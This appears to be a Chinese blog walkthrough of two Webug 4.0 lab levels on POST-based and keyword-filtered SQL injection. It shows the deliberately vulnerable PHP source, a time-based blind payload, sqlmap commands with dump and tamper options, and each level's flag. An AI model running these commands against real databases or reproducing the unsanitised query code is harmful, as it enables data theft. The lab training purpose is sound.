Webug4.0通关笔记03- 第4关POST注入和第5关过滤注入

目录

[第04关 POST型注入](#第04关 POST型注入)

1.源码分析

2.sqlmap注入

(1)bp保存报文

(2)sqlmap渗透

(3)获取flag

[第05关 过滤型注入](#第05关 过滤型注入)

1.源码分析

2.sqlmap渗透

(1)bp抓包保存报文

(2)sqlmap渗透

(3)获取flag


第04关 POST型注入

http://192.168.71.1/webug4/control/sqlinject/post_injection.phphttp://192.168.71.1/webug4/control/sqlinject/post_injection.php

1.源码分析

复制代码
<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}
/**
 * SELECT * FROM sqlinjection WHERE content = '1' or if(1=1, sleep(3),1); --+'
 */
if (isset($_POST["keyWordName"])) {
    if (!empty($_POST["keyWordName"])) {
        $sql = "SELECT * FROM sqlinjection WHERE content = '{$_POST["keyWordName"]}'";
        $res = $dbConnect->query($sql) or die("Invalid query: " . mysqli_stmt_error(). $sql);
    }
}
require_once TPMELATE."/post-injection.html";

相对于第01关、第02关、第03关均为字符型注入,闭合方式为单引号, 只是方式有点变换,由GET方法变为了POST方法。下面是SQL相关调用的关键方法,如下所示:

复制代码
SELECT * FROM sqlinjection WHERE content = '{$_POST["keyWordName"]}'

再看一下输出显示,根据源码可知与第01关相同,当SQL执行错误时会调用mysqli_stmt_error()函数,其余则是正常显示,存在时间盲注。

2.sqlmap注入

(1)bp保存报文

将报文保存为 webug04.txt

(2)sqlmap渗透

复制代码
sqlmap -r webug04.txt --current-db --dump --batch

如下所示渗透成功

(3)获取flag

根据如下可知,本关卡的flag为dsfasdczxcg

第05关 过滤型注入

http://192.168.71.1/webug4/control/sqlinject/filter_injection.phphttp://192.168.71.1/webug4/control/sqlinject/filter_injection.php

1.源码分析

复制代码
<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}
/**
 * SELECT * FROM sqlinjection WHERE content = '1' or if(1=1, sleep(3),1); --+'
 */
$filter = array('select', 'SELECT');
if (isset($_POST["keyWordName"])) {
    if (!empty($_POST["keyWordName"])) {
        if (in_array($_POST['keyWordName'], $filter)) {
            echo "<script>alert('请不要尝试注入危险函数')</script>";
        } else{
            $sql = "SELECT * FROM sqlinjection WHERE content = '{$_POST["keyWordName"]}'";
            $res = $dbConnect->query($sql) or die("Invalid query: " . mysqli_stmt_error(). $sql);
        }

    }
}
require_once TPMELATE."/post-injection.html";

相对于第01关、第02关、第03关均为字符型注入,闭合方式为单引号, 只是方式有点变换,由GET方法变为了POST方法。下面是SQL相关调用的关键方法,如下所示:

复制代码
SELECT * FROM sqlinjection WHERE content = '{$_POST["keyWordName"]}'

再看一下输出显示,根据源码可知与第01关相同,当SQL执行错误时会调用mysqli_stmt_error()函数,其余则是正常显示。另外,关于代码的过滤,通过源码可知源码中涉及到过滤SQL的关键字,共有两个,分别时select和SELECT过滤

复制代码
$filter = array('select', 'SELECT');
if (isset($_POST["keyWordName"])) {
    if (!empty($_POST["keyWordName"])) {
        if (in_array($_POST['keyWordName'], $filter)) {
            echo "<script>alert('请不要尝试注入危险函数')</script>";
        }
    }
}

不过这个in_array函数写的有问题,因in_array()函数是完全匹配,也就是说只有输入参数完全是select或者SELECT才可以弹框,其他情况不可以弹框

复制代码
in_array() 函数搜索数组中是否存在指定的值。
语法in_array(search,array,type)
参数:search 必需。规定要在数组搜索的值。
array 必需。规定要搜索的数组。

因为注入的时候,不可能参数只是select或者SELECT,所以这个过滤函数没有任何用,换言之这个写靶场的开发者对SQL注入部分的限制还是有点问题的。

2.sqlmap渗透

(1)bp抓包保存报文

将报文保存为webug05.txt文件

(2)sqlmap渗透

按照开发者的目的,猜测原本是希望使用sqlmap的绕waf脚本 randomcase.py**,将随机大小写来绕过源码对select关键字的过滤**

复制代码
sqlmap -r webug05.txt --current-db --dump --batch --tamper randomcase.py

如下所示渗透成功,发现时间盲注点

实际上本来不使用脚本也可注入成功,因为sqlmap会自动尝试编码绕过方法以渗透成功。更别提本关卡的过滤限制只是一个摆设而已,完全没有任何作用,故而渗透方法如下即可

复制代码
sqlmap -r webug05.txt --current-db --dump --batch

(3)获取flag

根据如下可知,本关卡的flag为safsafasdfasdf

相关推荐
北极光SD-WAN组网8 小时前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
落鹜秋水10 小时前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
未来之窗软件服务14 小时前
网站访问信息追踪系统在安全与性能优化中的关键作用——网络安全—仙盟创梦IDE
安全·web安全·性能优化·仙盟创梦ide·东方仙盟
介一安全19 小时前
【Web安全】逻辑漏洞之URL跳转漏洞:原理、场景与防御
安全·web安全·安全威胁分析·安全性测试·逻辑漏洞·url跳转
希望奇迹很安静20 小时前
文件包含学习总结
安全·web安全·渗透测试学习
波吉爱睡觉21 小时前
文件解析漏洞大全
web安全·网络安全
知孤云出岫1 天前
网络安全渗透攻击案例实战:某公司内网为目标的渗透测试全过程
安全·web安全
德迅云安全-如意1 天前
关于网络安全等级保护的那些事
网络·安全·web安全
lq_ioi_pl2 天前
回调后门 函数
android·安全·web安全
峥嵘life2 天前
欧盟网络安全标准草案EN 18031详解
安全·web安全